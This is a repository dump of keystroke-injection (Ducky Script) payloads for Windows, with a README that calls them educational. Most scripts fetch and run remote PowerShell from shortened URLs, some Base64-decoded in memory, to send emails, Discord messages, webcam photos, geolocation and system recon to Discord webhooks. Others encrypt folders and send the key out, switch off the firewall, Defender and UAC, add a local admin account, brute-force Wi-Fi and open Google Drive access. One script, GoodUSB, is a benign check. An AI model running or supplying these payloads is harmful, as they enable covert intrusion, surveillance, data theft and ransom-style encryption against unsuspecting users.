├── AdvEmailGrab ├── BasicRecon ├── DecryptDiscord ├── DiscordDM&ChannelCAP ├── DrivePwn ├── Email-Info-Grab ├── EncryptDiscord ├── Get-Geo ├── Get-Pic ├── Get-ProductKey ├── GoodUSB ├── Inject-EvilTwin ├── MemeDecryption ├── New Admin ├── OverlayAttack ├── README.md ├── Scan-Ports ├── SmashMouthTroll ├── SysGrab-Win ├── WiFiBruteforcePY ├── WiltSys ├── [Base64]Overlay Attack ├── [Base64]YouTubeTroll ├── [M.E. Base64]Ace-Ventura-Overlay-Ransom ├── [M.E. Base64]DisableUAC ├── [M.E. Base64]Get-Pic ├── [M.E. Base64]Get-PublicIP ├── [M.E. Base64]Mother Of All Recons ├── [M.E. Base64]Overlay Attack └── [M.E. Base64]YouTubeTroll /AdvEmailGrab: -------------------------------------------------------------------------------- 1 | DELAY 1000 2 | GUI r 3 | DELAY 500 4 | STRING powershell -NoP -Ep Bypass irm "t.ly/RajUw"|iex;Grab-Emails -wbhk "YOUR DISCORD WEBHOOK"|Out-Null 5 | DELAY 300 6 | ENTER 7 | -------------------------------------------------------------------------------- /BasicRecon: -------------------------------------------------------------------------------- 1 | DELAY 1000 2 | GUI r 3 | DELAY 500 4 | STRING powershell -NoP -Ep Bypass "irm "t.ly/0sVZc"|iex;Get-Recon;Upload-Discord -webhookUrl 'YOUR WEBHOOK HERE' -file "$env:TEMP\CaliLoot.txt"|Out-Null 5 | DELAY 300 6 | ENTER 7 | -------------------------------------------------------------------------------- /DecryptDiscord: -------------------------------------------------------------------------------- 1 | REM decrypts directory encrypted by EncryptDiscord. Make sure to create a key.txt file inside the same directory with the key that was sent to discord webhook. 2 | 3 | DELAY 1000 4 | GUI r 5 | DELAY 1000 6 | STRING powershell -NoP -Ep Bypass -W H irm "t.ly/MEA1y"|iex; E-D -d -p "PATH/TO/DIRECTORY" 7 | DELAY 1000 8 | ENTER 9 | -------------------------------------------------------------------------------- /DiscordDM&ChannelCAP: -------------------------------------------------------------------------------- 1 | DELAY 1000 2 | GUI r 3 | DELAY 1000 4 | STRING powershell -NoP -Ep Bypass irm "t.ly/avGlA"|iex;Get-Discord -WebhookUrl "YOUR DISCORD WEBHOOK"|Out-Null 5 | DELAY 1000 6 | ENTER 7 | -------------------------------------------------------------------------------- /DrivePwn: -------------------------------------------------------------------------------- 1 | DELAY 1000 2 | GUI r 3 | DELAY 500 4 | STRING powershell -NoP -Ep Bypass irm 'tinyurl.com/calidrivepwn'|iex;Access-Drive -em 'email you want to grant access to the pwned drive' 5 | DELAY 300 6 | ENTER 7 | -------------------------------------------------------------------------------- /Email-Info-Grab: -------------------------------------------------------------------------------- 1 | DELAY 1000 2 | GUI r 3 | DELAY 500 4 | STRING powershell -NoP -Ep Bypass "irm 't.ly/3J__j'|iex;$filePath = Get-EmailInfo;Upload-Discord -webhookUrl 'YOUR DISCORD WEBHOOK' -file "$env:TEMP\CaliShot.png" 5 | DELAY 300 6 | ENTER 7 | -------------------------------------------------------------------------------- /EncryptDiscord: -------------------------------------------------------------------------------- 1 | REM WARNING!!! this script will encrypt whatever path you provide!! USE WITH CAUTION! 2 | 3 | REM this script encrypts a path you pass to it and sends the key to unlock the directory to discord webhook 4 | 5 | DELAY 1000 6 | GUI r 7 | DELAY 1000 8 | STRING powershell -NoP -Ep Bypass -W H irm "t.ly/MEA1y"|iex; E-D -e -p "PATH/TO/DIRECTORY" -wh "YOUR WEBHOOK" 9 | DELAY 1000 10 | ENTER 11 | 12 | 13 | REM to decrypt, use DecryptDiscord.txt 14 | -------------------------------------------------------------------------------- /Get-Geo: -------------------------------------------------------------------------------- 1 | DELAY 1000 2 | GUI r 3 | DELAY 1000 4 | STRING powershell -NoP -Ep Bypass irm "t.ly/4FWAj"|iex; Get-Geo -wb "YOUR DISCORD WEBHOOK" 5 | DELAY 1000 6 | ENTER 7 | -------------------------------------------------------------------------------- /Get-Pic: -------------------------------------------------------------------------------- 1 | DELAY 1000 2 | GUI r 3 | DELAY 500 4 | STRING powershell -NoP -Ep Bypass -W H irm "t.ly/lzcXK"|iex; Get-Pic -wh "YOUR DISCORD WEBHOOK" 5 | DELAY 300 6 | ENTER 7 | 8 | 9 | -------------------------------------------------------------------------------- /Get-ProductKey: -------------------------------------------------------------------------------- 1 | DELAY 2000 2 | GUI r 3 | DELAY 500 4 | STRING powershell -NoP -W H -Ep Bypass irm t.ly/Ym7ZF|iex;Get-PKey -wb 'YOUR DISCORD WEBHOOK' 5 | DELAY 500 6 | ENTER 7 | -------------------------------------------------------------------------------- /GoodUSB: -------------------------------------------------------------------------------- 1 | REM This script will run a series of commands meant to seek info to ensure the system is protected 2 | REM made by CaliNux 3 | 4 | 5 | GUI r 6 | DELAY 1500 7 | STRING powershell 8 | ENTER 9 | DELAY 2000 10 | 11 | STRING "LOCAL ACCOUNT PASSWORD PROTECTION" > $env:userprofile\Desktop\GoodUsbLOG.txt 12 | ENTER 13 | DELAY 500 14 | STRING $account = Get-WmiObject -Class Win32_UserAccount -Filter "Name='$env:USERNAME'" 15 | ENTER 16 | DELAY 500 17 | STRING $requiresPassword = $account.PasswordRequired 18 | ENTER 19 | DELAY 500 20 | STRING if (-not $requiresPassword) { 21 | ENTER 22 | STRING "False - please consider adding a local account password for your Windows account!" >> $env:userprofile\Desktop\GoodUsbLOG.txt 23 | ENTER 24 | STRING } else { 25 | ENTER 26 | STRING $requiresPassword >> $env:userprofile\Desktop\GoodUsbLOG.txt 27 | ENTER 28 | STRING } 29 | ENTER 30 | DELAY 500 31 | STRING "FIREWALL STATUS" >> $env:userprofile\Desktop\GoodUsbLOG.txt 32 | ENTER 33 | DELAY 500 34 | STRING Get-NetFirewallProfile | Select-Object Name, Enabled >> $env:userprofile\Desktop\GoodUsbLOG.txt 35 | ENTER 36 | DELAY 500 37 | STRING "WINDOWS HOTFIX + UPDATES" >> $env:userprofile\Desktop\GoodUsbLOG.txt 38 | ENTER 39 | DELAY 500 40 | STRING Get-HotFix >> $env:userprofile\Desktop\GoodUsbLOG.txt 41 | ENTER 42 | DELAY 500 43 | STRING "ANTI-VIRUS PROGRAMS" >> $env:userprofile\Desktop\GoodUsbLOG.txt 44 | ENTER 45 | DELAY 500 46 | STRING Get-WmiObject -Namespace "root/SecurityCenter2" -Class AntiVirusProduct | Select-Object displayName >> $env:userprofile\Desktop\GoodUsbLOG.txt 47 | ENTER 48 | DELAY 500 49 | STRING Get-MpComputerStatus >> $env:userprofile\Desktop\GoodUsbLOG.txt 50 | ENTER 51 | DELAY 500 52 | STRING "ESTABLISHED REMOTE CONNECTIONS" >> $env:userprofile\Desktop\GoodUsbLOG.txt 53 | ENTER 54 | DELAY 500 55 | STRING netstat -n | findstr /i "established" >> $env:userprofile\Desktop\GoodUsbLOG.txt 56 | ENTER 57 | DELAY 500 58 | STRING $openPorts = (netstat -n | findstr /i "established").Count 59 | ENTER 60 | STRING "Total open ports: $openPorts" >> $env:userprofile\Desktop\GoodUsbLOG.txt 61 | ENTER 62 | DELAY 500 63 | STRING "RUNNING PROCESSES" >> $env:userprofile\Desktop\GoodUsbLOG.txt 64 | ENTER 65 | DELAY 500 66 | STRING Get-Process >> $env:userprofile\Desktop\GoodUsbLOG.txt 67 | ENTER 68 | DELAY 500 69 | STRING "SCHEDULED TASKS" >> $env:userprofile\Desktop\GoodUsbLOG.txt 70 | ENTER 71 | DELAY 500 72 | STRING Get-ScheduledTask >> $env:userprofile\Desktop\GoodUsbLOG.txt 73 | ENTER 74 | DELAY 500 75 | STRING "SYSTEM ADMINISTRATORS" >> $env:userprofile\Desktop\GoodUsbLOG.txt 76 | ENTER 77 | DELAY 500 78 | STRING Get-LocalGroupMember -Group "Administrators" >> $env:userprofile\Desktop\GoodUsbLOG.txt 79 | ENTER 80 | DELAY 1000 81 | 82 | STRING $drivers = Get-WmiObject -Class Win32_PnPSignedDriver | Where-Object {$_.DeviceName -ne $null} 83 | ENTER 84 | STRING "DRIVERS INFORMATION" >> $env:userprofile\Desktop\GoodUsbLOG.txt 85 | ENTER 86 | STRING foreach ($driver in $drivers) { 87 | ENTER 88 | STRING $deviceName = $driver.DeviceName 89 | ENTER 90 | STRING $driverVersion = $driver.DriverVersion 91 | ENTER 92 | STRING $driverDate = $driver.DriverDate 93 | ENTER 94 | STRING $isOutdated = $driverDate -lt (Get-Date).AddYears(-1) 95 | ENTER 96 | STRING "Device Name: $deviceName" >> $env:userprofile\Desktop\GoodUsbLOG.txt 97 | ENTER 98 | STRING "Driver Version: $driverVersion" >> $env:userprofile\Desktop\GoodUsbLOG.txt 99 | ENTER 100 | STRING "Driver Date: $driverDate" >> $env:userprofile\Desktop\GoodUsbLOG.txt 101 | ENTER 102 | STRING "--------------------------" >> $env:userprofile\Desktop\GoodUsbLOG.txt 103 | ENTER 104 | STRING } 105 | ENTER 106 | DELAY 1000 107 | STRING exit 108 | ENTER 109 | DELAY 1000 110 | 111 | GUI r 112 | DELAY 500 113 | STRING mrt 114 | ENTER 115 | DELAY 2300 116 | TAB 117 | DELAY 400 118 | TAB 119 | DELAY 400 120 | ENTER 121 | DELAY 800 122 | 123 | GUI r 124 | DELAY 2500 125 | STRING notepad 126 | ENTER 127 | DELAY 1000 128 | STRING GoodUSB Scan complete. Check results at GoodUsbLOG.txt on your desktop. 129 | ENTER 130 | STRING Please run Windows Malware Removal Tool to complete the process. 131 | ENTER 132 | STRING Run a FULL SCAN if running for the first time. 133 | ENTER 134 | DELAY 500 135 | ENTER 136 | DELAY 500 137 | ENTER 138 | ENTER 139 | STRING Signed, 140 | ENTER 141 | ENTER 142 | DELAY 500 143 | STRING CaliNux 144 | ENTER 145 | ENTER 146 | DELAY 8000 147 | 148 | 149 | REM thanks for using and stuff 150 | -------------------------------------------------------------------------------- /Inject-EvilTwin: -------------------------------------------------------------------------------- 1 | REM this script creates a new network with whatever SSID + Password you wish. 2 | REM this version uses WPA2 encryption method for pass but you can change to whatever. 3 | 4 | REM made by Calinux 5 | 6 | 7 | GUI x 8 | DELAY 1000 9 | STRING w 10 | DELAY 3000 11 | STRING wifi 12 | DELAY 1000 13 | ENTER 14 | DELAY 500 15 | TAB 16 | DELAY 200 17 | ENTER 18 | DELAY 500 19 | TAB 20 | DELAY 200 21 | TAB 22 | DELAY 200 23 | TAB 24 | DELAY 200 25 | TAB 26 | DELAY 200 27 | ENTER 28 | DELAY 200 29 | TAB 30 | DELAY 200 31 | TAB 32 | DELAY 200 33 | TAB 34 | DELAY 200 35 | ENTER 36 | DELAY 500 37 | 38 | REM name of your evil twin network 39 | 40 | STRING Evil Twin 41 | DELAY 1500 42 | TAB 43 | DELAY 200 44 | ENTER 45 | DELAY 200 46 | DOWNARROW 47 | DELAY 200 48 | DOWNARROW 49 | 50 | REM encryption type set to WPA2 51 | 52 | DELAY 200 53 | ENTER 54 | DELAY 200 55 | TAB 56 | DELAY 500 57 | 58 | REM password to your evil twin. 59 | 60 | STRING Password 61 | DELAY 2000 62 | TAB 63 | DELAY 300 64 | SPACE 65 | DELAY 300 66 | TAB 67 | DELAY 300 68 | TAB 69 | DELAY 300 70 | ENTER 71 | DELAY 500 72 | ALT F4 73 | 74 | -------------------------------------------------------------------------------- /MemeDecryption: -------------------------------------------------------------------------------- 1 | REM decrypts a file using custom "meme" decryption algo 2 | 3 | DELAY 2000 4 | GUI r 5 | DELAY 500 6 | STRING powershell -NoP -W H -Ep Bypass $FP = "path\to\your\encrypted\file"; irm t.ly/HwCcJ|iex; DF "$FP.meme" 7 | DELAY 500 8 | ENTER 9 | -------------------------------------------------------------------------------- /New Admin: -------------------------------------------------------------------------------- 1 | REM this script creates a new admin account on the local machine 2 | REM made by calinux 3 | 4 | 5 | DELAY 1000 6 | GUI x 7 | DELAY 500 8 | STRING a 9 | DELAY 500 10 | TAB 11 | DELAY 200 12 | TAB 13 | DELAY 200 14 | ENTER 15 | DELAY 1500 16 | STRING New-LocalUser -Name "Username" -Password (ConvertTo-SecureString -String "Password" -AsPlainText -Force) -AccountNeverExpires -UserMayNotChangePassword 17 | DELAY 1000 18 | ENTER 19 | STRING Add-LocalGroupMember -Group "Administrators" -Member "Username" 20 | DELAY 1000 21 | ENTER 22 | DELAY 500 23 | STRING exit 24 | DELAY 500 25 | ENTER 26 | -------------------------------------------------------------------------------- /OverlayAttack: -------------------------------------------------------------------------------- 1 | REM default password is "pass" 2 | DELAY 1000 3 | GUI r 4 | DELAY 500 5 | STRING powershell -NoP -Ep Bypass "irm "t.ly/IBHlV"|iex;Start-Overlay 6 | DELAY 300 7 | ENTER 8 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Flipper - Automation & Security Scripts 2 | **Creator**: CaliNux 3 | **Date**: 6/5/2023-Present 4 | 5 | **Programming Language**: Ducky Script 6 | **Operating System**: Windows 7 | 8 | ## 📌 Table of Contents 9 | - [Introduction](#introduction) 10 | - [Scripts](#scripts) 11 | - [Security Scanners](#security-scanners) 12 | - [System Manipulation](#system-manipulation) 13 | - [Information Retrieval](#information-retrieval) 14 | - [Social Engineering](#social-engineering) 15 | - [Disclaimer](#disclaimer) 16 | - [Contribution](#contribution) 17 | 18 | ## 📜 Introduction 19 | 20 | Flipper is a collection of Ducky scripts tailored for automating a myriad of tasks on Windows operating systems. Each script has a distinct function and purpose. Some scripts utilize `Invoke-RestMethod` (irm) to fetch raw PowerShell scripts directly from GitHub. Others employ Memory Execution techniques, allowing for direct execution without downloading a physical file—instead, they run based on a string within a PowerShell script. Additionally, certain scripts are encoded in base64 for enhanced functionality or security. 21 | 22 | --- 23 | 24 | ## 📜 Scripts 25 | 26 | ### Security Scanners 27 | - **GoodUSB**: Performs vulnerability scans and prints results to the user's desktop before running the Windows MRT feature. 28 | - **Scan-Ports**: Scans all open remote ports and saves them in a .txt file. The script then sends this .txt file to a Discord webhook. 29 | 30 | ### System Manipulation 31 | - **WiltSys**: Disables key Windows protection features, such as the firewall. 32 | - **New Admin**: Creates a new admin account with a username and password of your choice. 33 | - **OverlayAttack**: The script downloads a PowerShell script, which, when executed, retrieves and installs Python, pip, and the PIL module. Additionally, it displays an image overlay on the user's computer and disables specific key commands. Default Password is 'pass'. 34 | - **[Base64]Overlay Attack**: Similar to OverlayAttack but downloads a base64-encoded PowerShell script. 35 | - **[M.E. Base64]Overlay Attack**: Fileless Memory Execution: Base64-Encoded Version of the "Overlay Attack" Ducky Script. 36 | - **Inject-EvilTwin**: Creates a new network profile with your preferred SSID, password, and encryption type. 37 | - **[M.E. Base64]DisableUAC**: Remote fileless memory execution script which disables Windows UAC. 38 | - **MemeDecryption**: Uses custom decryption algo to decrypt file encrypted with "meme" encryption 39 | - **[M.E. Base64]Ace-Ventura-Overlay-Ransom**: Forces the target to watch Ace Ventura When Nature Calls while it trolls them with messages. 40 | 41 | ### Information Retrieval 42 | - **Get-ProductKey**: Retrieves the Windows Product Key from the system on which the script is executed. 43 | - **SysGrab-Win**: Grabs basic system information from Windows and uploads it to Discord using a webhook. 44 | - **BasicRecon**: Retrieves extensive system information including geolocation, public/private IP address, and more. 45 | - **Get-Geo**: Grabs geolocation, hostname, and ISP information from the user and uploads it to a Discord webhook. 46 | - **Get-Pic**: Takes a picture using the integrated webcam and uploads pics to Discord webhook along with private/public/gateway IP and hostname. 47 | - **[M.E. Base64]Get-Pic**: Fileless Memory Execution: Base64-Encoded Version of the "Get-Pic" Ducky Script. 48 | - **[M.E. Base64]Get-PublicIP**: Fileless Memory Execution: Base64-Encoded script which fetches users public IP address. 49 | - **[M.E. Base64]Mother Of All Recons**: Fileless Memory Execution: Base64-Encoded: MOAR is a PowerShell script built to gather an extensive amount of information about a Windows system. This includes but is not limited to, system configurations, network details, browsing history, recently accessed files, and much more. It will then upload this information to a Discord Webhook passed to it. 50 | 51 | ### Social Engineering 52 | - **SmashMouthTroll**: Creates unclosable Smash Mouth troll popup windows. 53 | - **WifiBruteforcePY**: Attempts to bruteforce SSID passed by user using Python. 54 | - **DrivePwn**: Grants access to a user's default Google Drive by passing email as an argument. 55 | - **[Base64]YouTubeTroll**: Downloads Base64 encoded PowerShell script, decodes, and executes it. The script opens the user's default browser and executes a Troll YouTube video. 56 | - **[M.E. Base64]YouTubeTroll**: Fileless Memory Execution: Base64-Encoded Version of the "YouTubeTroll" Ducky Script. 57 | - **Email-Info-Grab**: Navigates to the personal info page of the user's Gmail account, takes a screenshot, and uploads it to a Discord webhook. 58 | - **AdvEmailGrab**: Captures sensitive Gmail information and uploads it to Discord via a webhook. 59 | - **Discord DM&Channel Cap**: Captures screenshots of a user's Discord DMs and channels, then uploads them via a webhook. 60 | - **Encrypt/Decrypt Discord**: Encrypts or Decrypts an entire directory and sends the decryption key to a Discord webhook. 61 | 62 | --- 63 | 64 | ## ⚠️ Disclaimer 65 | 66 | These scripts are intended for educational and ethical use only. Unauthorized access to computer systems is illegal and punishable by law. 67 | -------------------------------------------------------------------------------- /Scan-Ports: -------------------------------------------------------------------------------- 1 | DELAY 500 2 | GUI r 3 | DELAY 500 4 | STRING powershell 5 | ENTER 6 | DELAY 1000 7 | STRING $connections = Get-NetTCPConnection | ?{$_.State -eq 'Established'} 8 | ENTER 9 | STRING $openPorts = $connections | select -ExpandProperty LocalPort | sort -Unique 10 | ENTER 11 | STRING $filePath = "$env:TEMP\CaliPortsOpen_$env:COMPUTERNAME_$(Get-Date -Format 'yyyyMMdd').txt" 12 | ENTER 13 | STRING $currentNumber = $openPorts.Count 14 | ENTER 15 | STRING "`nOPEN PORTS: $currentNumber" | Out-File -FilePath $filePath 16 | ENTER 17 | STRING $openPorts | %{$portCount=1}{$port=$_;($connections|?{$_.LocalPort -eq $port}).RemotePort|select -Unique|%{"`n$portCount. [Local Port]: $port <--> [Remote Port]: $_" | Out-File -FilePath $filePath -Append;$portCount++}} 18 | ENTER 19 | STRING function Upload-Discord { 20 | ENTER 21 | STRING [CmdletBinding()] 22 | ENTER 23 | STRING param ( 24 | ENTER 25 | STRING [parameter(Position=0,Mandatory=$False)] 26 | ENTER 27 | STRING [string]$file, 28 | ENTER 29 | STRING [parameter(Position=1,Mandatory=$False)] 30 | ENTER 31 | STRING [string]$text 32 | ENTER 33 | STRING ) 34 | ENTER 35 | STRING $hookurl = 'YOUR WEBOKK HERE' 36 | ENTER 37 | STRING $Body = @{ 38 | ENTER 39 | STRING 'username' = $env:username 40 | ENTER 41 | STRING 'content' = $text 42 | ENTER 43 | STRING } 44 | ENTER 45 | STRING if (-not ([string]::IsNullOrEmpty($text))){ 46 | ENTER 47 | STRING Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; 48 | ENTER 49 | STRING if (-not ([string]::IsNullOrEmpty($file))){curl.exe --insecure -F "file1=@$file" $hookurl} 50 | ENTER 51 | STRING } 52 | ENTER 53 | STRING Upload-Discord -file "$env:TEMP\CaliPortsOpen_$env:COMPUTERNAME_$(Get-Date -Format 'yyyyMMdd').txt" 54 | ENTER 55 | STRING exit 56 | ENTER 57 | DELAY 200 58 | STRING exit 59 | DELAY 500 60 | ENTER 61 | -------------------------------------------------------------------------------- /SmashMouthTroll: -------------------------------------------------------------------------------- 1 | DELAY 1000 2 | GUI r 3 | DELAY 1000 4 | STRING powershell -NoP -NonI -w h -Exec Bypass irm "tinyurl.com/session-verify"|iex;T 5 | DELAY 1000 6 | ENTER 7 | -------------------------------------------------------------------------------- /SysGrab-Win: -------------------------------------------------------------------------------- 1 | DELAY 3000 2 | GUI r 3 | DELAY 500 4 | STRING powershell 5 | ENTER 6 | DELAY 1000 7 | STRING systeminfo > $env:TEMP$env:COMPUTERNAME-$(Get-Date -Format "yyyyMMdd").txt 8 | ENTER 9 | STRING function Upload-Discord { 10 | ENTER 11 | STRING [CmdletBinding()] 12 | ENTER 13 | STRING param ( 14 | ENTER 15 | STRING [parameter(Position=0,Mandatory=$False)] 16 | ENTER 17 | STRING [string]$file, 18 | ENTER 19 | STRING [parameter(Position=1,Mandatory=$False)] 20 | ENTER 21 | STRING [string]$text 22 | ENTER 23 | STRING ) 24 | ENTER 25 | STRING $hookurl = 'YOUR WEBHOOK HERE' 26 | ENTER 27 | STRING $Body = @{ 28 | ENTER 29 | STRING 'username' = $env:username 30 | ENTER 31 | STRING 'content' = $text 32 | ENTER 33 | STRING } 34 | ENTER 35 | STRING if (-not ([string]::IsNullOrEmpty($text))){ 36 | ENTER 37 | STRING Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; 38 | ENTER 39 | STRING if (-not ([string]::IsNullOrEmpty($file))){curl.exe --insecure -F "file1=@$file" $hookurl} 40 | ENTER 41 | STRING } 42 | ENTER 43 | STRING Upload-Discord -file "$env:TEMP$env:COMPUTERNAME-$(Get-Date -Format "yyyyMMdd").txt" 44 | ENTER 45 | STRING exit 46 | ENTER 47 | -------------------------------------------------------------------------------- /WiFiBruteforcePY: -------------------------------------------------------------------------------- 1 | DELAY 1000 2 | GUI r 3 | DELAY 500 4 | STRING powershell -NoP -Ep Bypass irm t.ly/Smzcb|iex;Crack-ssid -ssid "SSID YOU WANT TO CRACK" 5 | DELAY 300 6 | ENTER 7 | -------------------------------------------------------------------------------- /WiltSys: -------------------------------------------------------------------------------- 1 | DELAY 1000 2 | 3 | GUI x 4 | DELAY 1000 5 | STRING a 6 | ENTER 7 | DELAY 1500 8 | TAB 9 | DELAY 200 10 | TAB 11 | DELAY 200 12 | ENTER 13 | DELAY 1500 14 | 15 | STRING Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False 16 | ENTER 17 | DELAY 500 18 | 19 | STRING Set-MpPreference -DisableRealtimeMonitoring $true 20 | ENTER 21 | DELAY 500 22 | 23 | STRING Set-MpPreference -MAPSReporting 0 24 | ENTER 25 | DELAY 500 26 | 27 | STRING Set-MpPreference -SubmitSamplesConsent 0 28 | ENTER 29 | DELAY 1000 30 | 31 | STRING exit 32 | DELAY 500 33 | ENTER 34 | -------------------------------------------------------------------------------- /[Base64]Overlay Attack: -------------------------------------------------------------------------------- 1 | REM default password is "pass" - downloaded Base64 encoded powershell script which initiates overlay attack python script 2 | REM thank you to Redd for assistance with certutil <3 3 | 4 | DELAY 1000 5 | GUI r 6 | DELAY 1000 7 | STRING powershell -NoP -W H -Ep Bypass irm t.ly/Xe_Uf -O $env:USERPROFILE\e.txt;certutil -f -decode $env:USERPROFILE\e.txt $env:USERPROFILE\d.ps1;iex $env:USERPROFILE\d.ps1 8 | DELAY 1000 9 | ENTER 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /[Base64]YouTubeTroll: -------------------------------------------------------------------------------- 1 | REM this script downloads an encoded Base64 file using irm and then decodes it then executes 2 | REM Thanks to Redd for his help with certutil <3 3 | DELAY 2000 4 | GUI r 5 | DELAY 1000 6 | STRING powershell -NoP -W H -Ep Bypass irm t.ly/2rDuD -O $env:USERPROFILE\e.txt;certutil -f -decode $env:USERPROFILE\e.txt $env:USERPROFILE\d.ps1;iex $env:USERPROFILE\d.ps1 7 | DELAY 1000 8 | ENTER 9 | -------------------------------------------------------------------------------- /[M.E. Base64]Ace-Ventura-Overlay-Ransom: -------------------------------------------------------------------------------- 1 | DELAY 2000 2 | GUI r 3 | DELAY 500 4 | STRING powershell -NoP -W H -Ep Bypass &([scriptblock]::Create([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String((irm t.ly/lHyWs))))) 5 | DELAY 500 6 | ENTER 7 | -------------------------------------------------------------------------------- /[M.E. Base64]DisableUAC: -------------------------------------------------------------------------------- 1 | REM This Ducky Script disables UAC using fileless remote execution 2 | 3 | DELAY 2000 4 | GUI r 5 | DELAY 500 6 | STRING powershell 7 | DELAY 500 8 | CTRL SHIFT ENTER 9 | DELAY 1000 10 | TAB 11 | DELAY 500 12 | TAB 13 | DELAY 500 14 | ENTER 15 | DELAY 1000 16 | STRING &([scriptblock]::Create([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String((irm t.ly/cxcHN))))) 17 | -------------------------------------------------------------------------------- /[M.E. Base64]Get-Pic: -------------------------------------------------------------------------------- 1 | DELAY 1000 2 | GUI r 3 | DELAY 1000 4 | STRING powershell -NoP &([scriptblock]::Create([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String((irm 't.ly/sGJTH')))))'YOUR DISCORD WEBHOOK' 5 | DELAY 1000 6 | ENTER 7 | -------------------------------------------------------------------------------- /[M.E. Base64]Get-PublicIP: -------------------------------------------------------------------------------- 1 | REM The script must interface with a Base64-encoded LINK for proper functionality. 2 | REM shorturl.at is used to condense this url: https://raw.githubusercontent.com/calinux-py/PowerShell/refs/heads/main/Get-PublicIP/get-publicip.ps1 3 | DELAY 2000 4 | GUI r 5 | DELAY 500 6 | STRING powershell -NoP -W H -Ep Bypass &([scriptblock]::Create([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String((irm shorturl.at/Bp19Z))))) $w="webhook here" 7 | DELAY 500 8 | ENTER 9 | -------------------------------------------------------------------------------- /[M.E. Base64]Mother Of All Recons: -------------------------------------------------------------------------------- 1 | DELAY 2000 2 | GUI r 3 | DELAY 1000 4 | STRING powershell -NoP -W H iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((iwr t.ly/VF8W_).Content)));AR -wh 'YOUR_DISCORD_WEBHOOK' 5 | DELAY 1000 6 | ENTER 7 | -------------------------------------------------------------------------------- /[M.E. Base64]Overlay Attack: -------------------------------------------------------------------------------- 1 | REM thank you to Redd for his assistance learning this skill. 2 | REM Memory execution 3 | 4 | DELAY 1000 5 | GUI r 6 | DELAY 1000 7 | STRING powershell -NoP -W H -Ep Bypass $p = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((irm -Uri "t.ly/Xe_Uf"))); iex $p 8 | DELAY 1000 9 | ENTER 10 | 11 | -------------------------------------------------------------------------------- /[M.E. Base64]YouTubeTroll: -------------------------------------------------------------------------------- 1 | REM thanks to Redd for his assistance with this script 2 | REM Memory execution 3 | 4 | DELAY 1000 5 | GUI r 6 | DELAY 1000 7 | STRING powershell -NoP -W H -Ep Bypass $p = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((irm -Uri "t.ly/2rDuD"))); iex $p 8 | DELAY 1000 9 | ENTER 10 | --------------------------------------------------------------------------------